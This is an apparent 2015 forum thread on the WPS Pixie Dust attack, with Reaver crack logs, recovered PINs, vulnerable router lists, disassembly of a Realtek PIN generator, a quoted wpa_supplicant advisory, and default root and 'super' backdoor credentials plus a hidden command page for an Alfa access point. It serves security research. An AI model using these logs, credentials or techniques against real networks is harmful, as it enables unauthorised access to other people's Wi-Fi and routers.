Sounds good. Great work everybody involved.
Got my first belkin today. first pin generated was the correct one.
Sounds good. Great work everybody involved.
Got my first belkin today. first pin generated was the correct one.
With pixie dust or the pin generator? Model number?
with the -W1 option.
Hi,soxrok... I see APPs on wireshark.. And there is problem... Pixie sees wrong values..Look screenshots..
http://imgur.com/XslVDB6Code:Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 07:34:36:3e:4a:0e:38:df:e7:cd:fa:15:85:92:9e:71 [P] PKE: 0d:da:3b:db:55:f3:68:cf:55:2b:98:93:18:0a:f4:77:28:58:3d:45:25:58:0a:35:f0:5c:b3:89:7e:3e:3a:f9:dc:49:0a:dd:7f:f0:bb:61:3d:20:8a:fb:d7:d7:17:d0:fa:94:ad:26:5a:8d:70:9e:a1:3c:7f:cb:69:9c:a1:a7:f7:b5:d7:bf:6b:d4:fb:7c:e4:51:fb:f9:6b:9c:ef:5b:94:6c:7d:7a:4e:40:11:49:83:3d:bb:84:2a:cc:23:f9:3c:63:7f:af:70:4b:28:33:ea:f5:f5:05:38:19:76:09:8c:6a:8b:37:9e:27:ec:63:96:c1:f4:ab:23:27:d9:57:30:3b:b9:9d:55:e9:76:5d:81:5c:07:b4:8c:90:0c:02:37:9c:2f:f7:2d:6f:5b:b2:a0:4f:ee:9a:88:a1:1f:f4:3f:bd:78:6f:d5:8a:48:6f:fe:c7:b7:c2:da:9e:68:b8:35:0e:3e:e5:f3:4d:e1:4b:5f:b0:08:c9:d4:9e:a7:93 [P] WPS Manufacturer: AirTies Wireless Networks [P] WPS Model Number: 1.0.2.0 [P] Access Point Serial Number: AT1731434014674 [+] Received M1 message [P] PKR: 07:a0:3b:9f:28:60:17:1f:38:52:9e:7e:0b:5f:ef:04:62:15:b6:86:05:cb:4b:ee:f4:64:4f:a1:fd:35:da:3e:54:a6:26:c7:93:2a:b5:00:1c:e7:81:37:58:e8:ec:d1:fb:08:3a:f3:44:53:64:a1:41:02:25:ed:41:87:a5:85:aa:c6:98:87:7c:41:8f:a0:e6:96:0b:52:b3:bf:18:05:00:18:16:f0:4c:12:41:e1:bc:ca:e5:12:d0:67:2a:99:cb:04:2f:bb:21:22:9b:99:38:13:5b:ed:44:52:4e:f8:35:81:9f:98:63:f7:98:d9:6a:6f:a2:e8:3b:71:13:cd:e4:6a:b9:3e:51:d2:43:7f:a1:eb:7f:6a:74:5b:06:b2:29:55:5e:c9:27:36:a9:d7:1a:e0:3e:78:35:63:68:33:10:8c:44:64:96:86:96:03:74:d8:59:df:47:03:26:e3:5c:5b:93:18:ac:71:39:29:c5:4e:98:ef:3e:77:73:6a [P] AuthKey: 99:58:17:50:f0:15:e3:c8:aa:75:c0:0f:fe:47:d7:b8:e8:f7:bf:af:9d:8a:64:91:74:1c:6f:36:21:1d:72:d5 [+] Sending M2 message [P] E-Hash1: 80:3f:98:56:4f:6c:f7:64:bf:e9:39:9a:d9:39:24:04:7b:b4:84:44:48:81:6a:6b:e3:ba:c5:ee:86:c5:d1:32 [P] E-Hash2: 79:d2:d0:6a:0e:12:82:d8:ae:9f:32:aa:21:95:07:ef:45:12:78:a6:ba:60:c2:aa:24:a2:db:b2:ca:51:8b:bb [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust][*] Time taken: 2 s [Pixie-Dust]
http://imgur.com/fnrrZUnCode:Trying pin 12345670. [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [P] E-Nonce: 6a:34:66:5e:16:2c:db:cb:5b:11:f7:cc:78:a3:a0:c9 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: Realtek Semiconductor Corp. [P] WPS Model Number: EV-2006-07-27 [P] Access Point Serial Number: 123456789012347 [+] Received M1 message [P] PKR: 19:fc:9c:fb:93:99:c3:5b:96:d8:d1:71:92:2e:64:89:85:5e:b8:c2:51:cc:f0:3d:e5:87:ef:8a:4d:5b:fd:63:bb:4d:ac:1d:d5:fd:ec:a6:ab:f2:35:80:33:bc:c9:61:4f:f5:6b:51:ce:1c:64:dd:c8:e2:a2:aa:98:5d:b0:8c:fe:90:1f:db:fb:a1:13:ec:55:29:4f:3e:49:3a:80:62:4d:fe:77:9e:6e:78:25:5f:5d:30:8f:34:20:2a:28:82:2f:08:23:af:86:79:29:1c:be:e8:75:af:c8:a7:e9:90:52:2a:15:cd:49:21:c0:00:62:91:3e:1e:94:11:55:92:28:54:81:89:f9:af:99:b8:f4:7a:29:80:0a:92:69:18:63:97:5f:85:73:51:af:9b:63:fb:a3:dc:0e:7d:eb:2b:23:3d:8b:4f:50:e5:eb:9b:bc:7e:d6:2b:21:93:09:52:6b:8a:71:d0:33:31:6c:82:01:f3:ee:85:77:97:2c:ae [P] AuthKey: 2b:da:97:bc:a7:06:a8:e9:94:6e:ff:f3:70:e3:84:8d:ec:48:ad:b0:ba:49:74:6b:a0:31:93:db:ac:71:9a:09 [+] Sending M2 message [P] E-Hash1: 88:a0:55:ea:db:12:db:0d:f4:61:91:5c:3f:e7:11:07:6d:5a:1f:57:b2:7e:fc:6e:34:29:3f:2a:de:56:c8:74 [P] E-Hash2: 97:c4:d6:06:29:db:a1:bf:4c:e9:96:c2:ee:6f:dd:e6:df:b6:30:c1:20:68:e5:2e:d2:ef:d6:82:43:38:31:b6 [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust][*] Time taken: 2 s [Pixie-Dust]
http://imgur.com/1MrIW4KCode:Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [P] E-Nonce: da:42:7d:5e:4c:b6:a3:98:b5:f3:41:77:42:8e:a6:d8 [P] PKE: c6:bc:d8:bc:9a:be:0e:e3:ef:06:dd:55:bc:07:79:1b:56:32:76:fd:63:b9:b1:84:a6:6a:fe:ec:98:d8:d1:ae:62:fe:23:e1:c1:93:39:81:5a:ff:69:56:32:28:12:3e:2b:de:7a:d6:79:93:0a:b2:3a:fd:35:e2:03:2b:e7:4b:08:fc:81:76:c9:46:1a:8b:96:1a:f3:bf:85:99:f8:fb:d3:b5:91:a9:96:92:ad:fd:90:17:45:a6:34:9a:01:9f:a0:df:4d:a3:d4:0e:38:bc:79:b2:9e:38:c2:7b:5e:8c:97:b9:23:89:6c:91:e1:ae:82:bf:f0:86:06:ff:11:da:30:14:dc:39:28:c6:51:07:05:a3:b0:50:93:5b:50:44:8a:5f:19:e8:a7:2c:86:22:21:b4:2a:11:40:e7:e8:53:e5:0d:7f:b1:90:a2:01:c7:7a:5e:65:2a:cc:13:7d:3b:3c:00:67:00:ee:66:40:93:7e:7d:c9:0b:d8:62:fc:37 [P] WPS Manufacturer: ZyXEL [P] WPS Model Number: P-660W-T1 v3 [P] Access Point Serial Number: 00000001 [+] Received M1 message [P] PKR: 80:d4:14:fc:c5:52:20:b5:15:b0:e4:4d:d4:ed:39:aa:aa:04:7c:b5:b4:c7:a7:68:f3:53:5a:d6:1b:40:74:66:45:88:19:ab:32:54:ff:62:c7:73:3e:f8:20:1e:39:7b:98:2e:79:2a:6f:2c:c0:f5:2c:11:af:8b:fc:ed:5b:09:03:bb:05:15:c3:b4:2a:1e:ec:8a:11:ee:ef:45:b0:8f:4d:47:5c:76:ed:8f:01:c5:4f:38:2e:58:25:54:df:af:9a:c7:9e:d4:1f:d5:ae:9b:47:87:7e:91:03:74:62:52:b7:c7:b8:30:27:a5:77:8f:42:f4:1c:d7:8c:40:71:ce:41:ae:c5:92:d4:7f:90:9b:ee:7f:f7:6f:c6:8c:74:c6:8e:aa:50:65:b4:7f:42:ce:e3:76:54:fb:cc:1d:c9:93:2a:96:15:76:4b:86:9a:18:8f:f8:17:48:4f:5c:d6:37:29:be:e1:4e:95:91:4b:21:fa:2c:2c:73:57:88:f4:0b [P] AuthKey: c5:d7:f1:9d:c1:ae:3a:ff:ba:91:7e:74:e3:22:ab:d2:1c:4e:fe:d8:e4:77:07:76:2a:14:92:e5:e1:67:99:c9 [+] Sending M2 message [P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b:8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b [P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9:47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust][*] Time taken: 1 s [Pixie-Dust]
Code:Trying pin 12345670. [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4 [P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68:dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0:01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70:bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39:d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3:f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:88:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3:81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09:68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8e:b5:ea:f8:81:f4:74:d9:fc [P] WPS Manufacturer: TP-LINK [P] WPS Model Number: 1.0 [P] Access Point Serial Number: 14CC200000* [+] Received M1 message [P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a:07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:02:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53:fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6:b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:12:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a:5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81:5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:ba:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd:02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e:8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:48:d6:39:97:68:4f:fb:28:bc [P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e:3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0 [+] Sending M2 message [P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a:52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc [P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51:40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57 [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust][*] Time taken: 2 s [Pixie-Dust]
AND This AP VULNERABLE , pixi sees true values
http://imgur.com/zlmrfjOCode:Trying pin 12345670. ............................. [P] WPS Manufacturer: Ralink Technology, Corp. [P] WPS Model Number: RT2860 [P] Access Point Serial Number: 12345678 [+] Received M1 message [P] PKR: ................ e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04:b9:80 [P] AuthKey: [+] Sending M2 message [P] E-Hash1: [P] E-Hash2: [Pixie-Dust] [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust][*] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5 [Pixie-Dust][*] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae [Pixie-Dust] [+] WPS pin: 71632285 [Pixie-Dust] [Pixie-Dust][*] Time taken: 0 s [Pixie-Dust]
I think this is problem so Pixie not vulnerable , Realtek ,brodcom and atheros chipsets ....
I don t know but probably
Last edited by Saydamination; 2015-05-16 at 21:14.
hello
Hold on a second my friend : this thread is to speak about pixie dust attack "theoretically"; not for reporting bugs using modified reaver ( you have another thread for that )
pixiewps ( you have another thread to speak about it ) does not "see" any value,"Pixie sees wrong values."
Or you enter the value manually, or you use a script or you are using the automated reaver (that is the case )...
I suggest you to post in the correct thread : Reaver modfication for Pixie Dust Attack
cheers
When it's ready. I was told very soon. Kept checking back here. Or u could follow the github
I can beta also
Hi,
Got the Firmware, unpacked with fmk, checked with idapro.
Found this function in wscd (it's the "gen-pin" function from the .sh script), but i'm not as good in mips, the (in my opinion) important parts are marked, maybe someone, who's familiarized with mips can tell something about.
Code:LOAD:0040C4C4 la $t9, gettimeofday LOAD:0040C4C8 move $a1, $zero LOAD:0040C4CC jalr $t9 ; gettimeofday LOAD:0040C4D0 addiu $a0, $sp, 0xF0+var_68 LOAD:0040C4D4 lw $gp, 0xF0+var_D8($sp) LOAD:0040C4D8 lw $a0, 0xF0+var_68($sp) LOAD:0040C4DC la $t9, srand LOAD:0040C4E0 nop LOAD:0040C4E4 jalr $t9 ; srand LOAD:0040C4E8 nop LOAD:0040C4EC lw $gp, 0xF0+var_D8($sp) LOAD:0040C4F0 nop LOAD:0040C4F4 la $t9, rand LOAD:0040C4F8 nop LOAD:0040C4FC jalr $t9 ; rand LOAD:0040C500 nop LOAD:0040C504 li $v1, 0x6B5FCA6B LOAD:0040C50C mult $v0, $v1 LOAD:0040C510 sra $a0, $v0, 31 LOAD:0040C514 lw $gp, 0xF0+var_D8($sp) LOAD:0040C518 nop LOAD:0040C51C la $t9, 0x400000 LOAD:0040C520 nop LOAD:0040C524 addiu $t9, (sub_404128 - 0x400000) LOAD:0040C528 mfhi $v1 LOAD:0040C52C sra $v1, 22 LOAD:0040C530 subu $a1, $v1, $a0 LOAD:0040C534 sll $a0, $a1, 5 LOAD:0040C538 subu $a0, $a1 LOAD:0040C53C sll $v1, $a0, 6 LOAD:0040C540 subu $v1, $a0 LOAD:0040C544 sll $v1, 3 LOAD:0040C548 addu $v1, $a1 LOAD:0040C54C sll $a0, $v1, 2 LOAD:0040C550 addu $v1, $a0 LOAD:0040C554 sll $v1, 7 LOAD:0040C558 subu $a1, $v0, $v1 LOAD:0040C55C sll $s0, $a1, 2 LOAD:0040C560 move $a0, $a1 LOAD:0040C564 jalr $t9 ; sub_404128 LOAD:0040C568 addu $s0, $a1 LOAD:0040C56C lw $gp, 0xF0+var_D8($sp) LOAD:0040C570 sll $s0, 1 LOAD:0040C574 addu $a0, $s0, $v0 LOAD:0040C578 la $t9, 0x400000 LOAD:0040C57C nop LOAD:0040C580 addiu $t9, (sub_403F60 - 0x400000) LOAD:0040C584 jalr $t9 ; sub_403F60 LOAD:0040C588 addiu $a1, $sp, 0xF0+var_D0 LOAD:0040C58C lw $gp, 0xF0+var_D8($sp) LOAD:0040C590 addiu $a1, $sp, 0xF0+var_D0 LOAD:0040C594 la $a0, 0x440000 LOAD:0040C598 la $t9, printf LOAD:0040C59C nop LOAD:0040C5A0 jalr $t9 ; printf LOAD:0040C5A4 addiu $a0, (aPinS - 0x440000) # "PIN: %s\n" LOAD:0040C5A8 lw $gp, 0xF0+var_D8($sp) LOAD:0040C5AC li $a0, 0xADAC LOAD:0040C5B0 addu $a0, $s2, $a0 LOAD:0040C5B4 la $t9, strcpy LOAD:0040C5B8 b loc_40C8C0 LOAD:0040C5BC addiu $a1, $sp, 0xF0+var_D0
WoW
Thank you SO MUCH someone else ( i mean you, not someone else )
It is much more "readable" than what i got.
i am not used to MIPs neither (my poor skills in dissembling speak for-themselves :P )
i wil try to with the tool you used, i am curious about LOAD:0040C8C0 / and checking sub_404128 / sub_403F60
The very last line you underline is definitely like a simple "printf" that's "stdout" the value of the PIN
SO GREAT!
first, thanks to you, we know 100% sure that building time is the string used with some randomization.
the startup.sh script was giving a strong clue : time was "generated" just before the PIN....
Another clue : we already know that time is used as a seed for the diffie Hellman key exchange.
Now we know : time is definitely and surely used to generate the default PIN
And it is the first build time.
That's kind of an issue if we look in a way to generate the exact default PIN. . depending of the randomization, but it looks like this with the devices i saw; we might be able to guess the firsts digit correctly realtioning with the year of production,,,, then the PIN respects the checksum so the seconds start on 7 digits
One hour is 3600 seconds and we would need to have maximum about 15 minutes more or less from exact building time to get the first half of PIN... sorry for my english, but i guess you see what i mean...
but a little pixie flying around told me that this kind of "unsuported realteck" would, maybe, who knows?, not be unsupported anymore for so long....
thanks so much for the information and it is helping a lot.................
Last edited by kcdtv; 2015-04-28 at 21:46.
DOH! How did i forget about fmk, but last i used it was when i was taking part in "jailbreaking" the neotv 300b. Looks like i got some playing to do :-D
Hello kcdtv,
I have same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1, just to tell you that you can change this "permanent" WPS pin, not only that but change mac address. There's 2 ways to do it:
- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp
Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled on source code ); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device
With wscd -gen-pin you can generate pins randomly, but there's other command tool named flash (like nvram) that stores values permanently over reboots:
// get WPS pin
# flash get wlan0 HW_WSC_PIN
HW_WSC_PIN="77756886"
// generate a "random" WPS pin
# flash -gen-pin
// save a new pin manually for instance 88884444 (reboot afterwards to take effect)
# flash set wlan0 HW_WSC_PIN 88884444
// change mac address permanently on wlan0
# flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014
// change mac address temporarily (untill reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
# ifconfig wlan0 hw ether 00c0ca111111
About that pin generator -gen-pin I did find stuff over some extracted files from firmware, but I missed some stuff that I need to extract again cause it was long ago and over telnet I saw more info.
Did you have a look at the source code over this web page http://192.168.2.1/wlwps.asp?
There's a function genPinClicked() maybe it will help to look it up.
Congrats everyone for your efforts
Last edited by reversetheg@p; 2015-04-29 at 15:58. Reason: duplicated quote
WoW && WoW
Like someone else you are amazing too
Thta's actualy one of the most exiting thread , full of amazing people, you guys rules!
YES!- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
You don't know how much I was looking for that!
'cause I noticed telnet is enabled even-thought there is no way to enable / or disable it / or configure it (from the web interface with the proposed option)
But I couldn't log in.
Now i can thank you SO MUCH that's awsome
By the way, did you noticed this permanent "super" backdoor?
With credentials super:super you can log with administrator privileges. (but not in telnet)
i get a 404 error when i try to acess this web page or if i try to execute a command through POST request (but i am not use at all to this so maybe i do something wrong)- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp
i also use version v3.2.0.2.6 different then your. I should make a downgade to check al this very interesting and fundamentals elements that you bring to us.
Thanks for showing us and explaining us all this system around PIN managment (and so much more, this are tremendous informations )
@ kcdv
i'm glad, that i could help and i'm with you: great thread !
And a little update :
VULNERABLE:
Edimax
Fonera Fon 2.0n (FON 2303B)
Ralink RT 3052
Code:[P] E-Nonce: 72:a5:2f:83:81:21:32:85:04:2c:30:60:d8:cf:ab:9e [P] PKE: 6a:b2:23:7b:37:81:58:2c:f6:a1:0c:f9:a8:ec:4c:14:70:dc:0b:70:a1:cb:1e:dc:0a:22:17:2d:b0:83:c4:bc:3a:47:b7:39:a9:63:ea:57:ff:38:ba:61:6d:2f:f7:45:96:45:80:70:1d:cf:27:1f:8a:84:52:77:e0:5c:e9:c1:72:9d:e7:8a:20:70:aa:29:e3:3d:ea:01:c5:34:c9:70:64:e3:72:c7:9a:08:b5:86:61:32:a0:7d:80:b6:e1:9c:5c:57:ab:90:4b:f5:24:50:cb:3e:31:e3:6e:d0:f9:a2:67:ab:69:71:07:9d:35:fc:97:0d:25:fa:2f:a3:d2:be:ae:eb:a2:34:9e:e5:f6:92:27:80:88:0b:fc:24:ee:b3:47:e9:35:17:a1:f5:c2:72:58:44:e6:cd:49:05:4a:2a:23:26:a3:99:8d:ae:54:bd:a7:c0:7c:3a:52:28:fc:58:a6:2b:aa:dc:b5:88:4d:b9:4f:04:41:98:82:25:2a:0a [P] PKR: 5d:8e:b8:d7:5d:71:79:d3:c1:d5:b1:72:b4:d0:8d:85:f0:5c:13:5f:1e:8c:35:fb:83:2e:15:9a:c9:ed:0f:bf:45:48:93:77:38:2f:90:4a:4c:53:ae:4b:ee:18:4d:cc:d8:98:d8:6c:98:b2:3f:45:fe:0c:52:1b:69:75:b4:85:d0:44:1e:ca:ad:8c:57:b6:a5:13:72:5a:8b:0d:38:1a:50:21:24:71:14:7d:13:72:65:92:53:1c:de:f3:a9:03:c5:ba:65:ff:64:c8:ac:84:00:7b:c9:8b:03:61:6c:9b:39:56:4d:3a:27:a8:66:de:79:99:a2:ab:82:9c:e2:98:53:61:ba:8d:d3:9b:47:4e:d3:ff:f1:8d:e0:61:39:f6:9f:35:a2:2f:23:c4:ed:af:da:a0:77:bc:b2:db:36:21:8c:9d:14:27:96:61:22:89:37:33:09:fa:2b:1f:f0:99:9e:ea:e8:59:ad:bc:8d:d9:75:0a:db:c9:f9:43:ba:83 [P] AuthKey: 54:76:bd:c3:63:02:b2:fe:02:dd:fb:2e:db:e5:3d:2f:0f:4e:a9:e2:bc:cb:fb:d6:58:a9:47:c8:ea:56:99:34 [P] E-Hash1: 08:80:1e:79:8c:5f:27:fb:09:d3:35:cb:e3:59:67:c2:c6:48:4b:d3:0f:5a:cc:42:05:c9:80:e9:83:36:ea:c2 [P] E-Hash2: 6c:b5:bb:78:81:8d:c1:41:af:c0:32:91:8a:b6:13:64:fe:39:26:b6:76:85:ad:e7:37:d9:cc:7e:d2:c1:db:41
@kcdtv pointed out a newly documented "flaw" I guess i would call it: http://w1.fi/security/2015-1/wpa_sup...d-overflow.txt
It was something was I was actually considering a few days ago, but I guess people beat me to it :P
Anyways, it looks like this may be a gateway into a bunch more information... potentially information dumps, router reboots, memory leaks, the list goes on and on. I personally don't know how to implement it. There is an option in mdk3 that does something similar, but it doesn't work for theses purposes... maybe it can be modified? If you run mdk3 --fullhelp I think the command is p but I don't recall.
If you don't want to click the link, it is just a text document:
That text is not mine, it comes verbatim from the link I posted above. I take no credit and do not mean to infringe any copyrights or screw with any legal stuff that I don't know about.Code:wpa_supplicant P2P SSID processing vulnerability Published: April 22, 2015 Identifier: CVE-2015-1863 Latest version available from: http://w1.fi/security/2015-1/ Vulnerability A vulnerability was found in how wpa_supplicant uses SSID information parsed from management frames that create or update P2P peer entries (e.g., Probe Response frame or number of P2P Public Action frames). SSID field has valid length range of 0-32 octets. However, it is transmitted in an element that has a 8-bit length field and potential maximum payload length of 255 octets. wpa_supplicant was not sufficiently verifying the payload length on one of the code paths using the SSID received from a peer device. This can result in copying arbitrary data from an attacker to a fixed length buffer of 32 bytes (i.e., a possible overflow of up to 223 bytes). The SSID buffer is within struct p2p_device that is allocated from heap. The overflow can override couple of variables in the struct, including a pointer that gets freed. In addition about 150 bytes (the exact length depending on architecture) can be written beyond the end of the heap allocation. This could result in corrupted state in heap, unexpected program behavior due to corrupted P2P peer device information, denial of service due to wpa_supplicant process crash, exposure of memory contents during GO Negotiation, and potentially arbitrary code execution. Vulnerable versions/configurations wpa_supplicant v1.0-v2.4 with CONFIG_P2P build option enabled Attacker (or a system controlled by the attacker) needs to be within radio range of the vulnerable system to send a suitably constructed management frame that triggers a P2P peer device information to be created or updated. The vulnerability is easiest to exploit while the device has started an active P2P operation (e.g., has ongoing P2P_FIND or P2P_LISTEN control interface command in progress). However, it may be possible, though significantly more difficult, to trigger this even without any active P2P operation in progress. Acknowledgments Thanks to Google security team for reporting this issue and smart hardware research group of Alibaba security team for discovering it. Possible mitigation steps - Merge the following commits to wpa_supplicant and rebuild it: P2P: Validate SSID element length before copying it (CVE-2015-1863) This patch is available from http://w1.fi/security/2015-1/ - Update to wpa_supplicant v2.5 or newer, once available - Disable P2P (control interface command "P2P_SET disabled 1" or "p2p_disabled=1" in (each, if multiple interfaces used) wpa_supplicant configuration file) - Disable P2P from the build (remove CONFIG_P2P=y)
Anyways, I guess SSID information comes from Management frames, which are unencrypted packets.... check it out here: http://www.wi-fiplanet.com/tutorials...le.php/1447501 They can't be encrypted because they "establish and maintain connections" (quoted form wi-fi planet) making it a whole lot easier for attackers. There is no encryption to break so it should be a fairly straightforward process
If you are worried about this, I suggest you get an AP that supports 802.11w. Read about it here: http://www.cisco.com/c/en/us/td/docs...apter_0100.pdf
Let me know what you think about this!
Last edited by soxrok2212; 2015-04-30 at 00:40.
Where can i get a copy of this firmware everyone is picking apart right now? I've tried to find some arris firmwares(as some seem to be invulerable to pixie) but they are apparently very tightly guarded and i do not own one or i would dump it myself. Definently no downloads for them, but if i get my hands on one physically... different story :-D
email username @ gmail
http://sourceforge.net/projects/alfa...iles/Firmware/
Alfa AIP-W525H I believe.... not sure if it is v1 or v2 though.
Manufacturer: Greenwave
Device Name: GreenWave BHR4
Model Number: 4
000000000:6F4| 1|-61|1.0|No |FiO00000000| GreenWave| 4|
Greenwave Systems, no wikidevi, fccid
NOT Vulnerable
Last edited by nuroo; 2015-04-30 at 15:47.
not work on technicolor TD5130 V1 and THOMSON AP
Worked fine for me when I tested. You need to wait for the whole realtek tool to be released. It is almost done.
Big Teaser !
soxrok2212 i have tried many time on my network but no result
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 18:17:25:xx:xx:xx
[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:86:d7:2d:5a:11:c1:36:51:97:d7:16:54:c3:de:7f
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: Technicolor TD5
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1343A1D22901
[+] Received M1 message
[P] R-Nonce: c0:68:f8:86:c5:14:c2:aa:d8:5f:56:29:51:0c:fd:d4
